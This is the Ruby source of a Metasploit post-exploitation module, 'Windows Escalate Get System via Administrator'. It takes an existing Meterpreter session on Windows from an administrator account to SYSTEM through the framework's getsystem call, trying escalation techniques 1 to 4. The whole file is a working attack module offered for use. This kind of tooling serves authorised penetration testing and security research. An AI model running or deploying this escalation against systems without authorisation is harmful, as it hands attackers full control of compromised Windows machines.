metasploit-framework/modules/post/windows/escalate/getsystem.rb

68 lines
1.5 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'metasm'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Escalate Get System via Administrator',
'Description' => %q{
This module uses the builtin 'getsystem' command to escalate
the current session to the SYSTEM account from an administrator
user account.
},
'License' => MSF_LICENSE,
'Author' => 'hdm',
'Version' => '$Revision$',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options([
OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-4), otherwise try them all", 0])
], self.class)
end
def unsupported
print_error("This version of Meterpreter is not supported with this script!")
raise Rex::Script::Completed
end
def run
tech = datastore['TECHNIQUE'].to_i
unsupported if client.platform !~ /win32|win64/i
if is_system?
print_good("This session already has SYSTEM privileges")
return
end
result = client.priv.getsystem( tech )
if result and result[0]
print_good( "Obtained SYSTEM via technique #{result[1]}" )
else
print_error( "Failed to obtain SYSTEM access" )
end
end
end